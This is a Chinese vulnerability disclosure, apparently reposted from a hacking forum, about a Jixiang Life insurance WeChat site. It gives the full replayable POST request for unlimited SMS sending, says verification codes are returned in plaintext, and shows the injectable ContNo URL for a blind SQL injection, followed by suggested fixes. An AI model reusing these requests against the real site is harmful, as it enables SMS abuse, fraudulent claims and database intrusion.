吉祥人寿某分站(逻辑错误,敏感信息泄漏,SQL注入)漏洞

　　吉祥人寿某分站(逻辑错误,敏感信息泄漏,SQL注入)漏洞

　　吉祥人寿赠险系统http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName=

 

　　问题1#利用抓包重放可达到短信任意发送

　　POST http://weixin.jxlife.com.cn/jxlife/jsp/getPhoneCode HTTP/1.1

　　Accept: application/json, text/javascript, */*; q=0.01

　　Content-Type: application/x-www-form-urlencoded; charset=UTF-8

　　X-Requested-With: XMLHttpRequest

　　Referer: http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName=

　　Accept-Language: zh-cn

　　Accept-Encoding: gzip, deflate

　　User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; WOW64; Trident/5.0)

　　Host: weixin.jxlife.com.cn

　　Content-Length: 22

　　Connection: Keep-Alive

　　Pragma: no-cache

　　Cookie: 229667067=0; JSESSIONID=D93E48BFF14BB07ECA416A5D0CACCF6B; CNZZDATA1254189807=1614033562-1436270012-%7C1436270012

　　AppntPhone=你所指定的电话号码

　　我大概在1分钟内，利用重放，给自己发了11条，当然，还可以更多。

 

　　2#系统设计缺陷，短信验证码直接明文返回给用户，导致赠险可以任意领

 

　　我用13888888888的号码给自己领了份赠险

 

　　3#sql注入

　　http://weixin.jxlife.com.cn/jxlife/jsp/trafficDetailQuery.page?ContNo=900004299434&way=&QAppntIDNo=110101198808085638&QAppntPhone=13888888888

　　Parameter: ContNo (GET)

　　Type: boolean-based blind

　　Title: AND boolean-based blind - WHERE or HAVING clause

 

 

　　表LRPOL

 

 

　　时间关系，不一一截图了，跑得比较慢

　　解决方案：

　　sql注入：请修改程序，参数化查询短信任意发送：后台程序判断发送次数与时间间隔，增加黑名单删除前台的验证码返回值

原文地址:https://hack.77169.com/201509/210212.shtm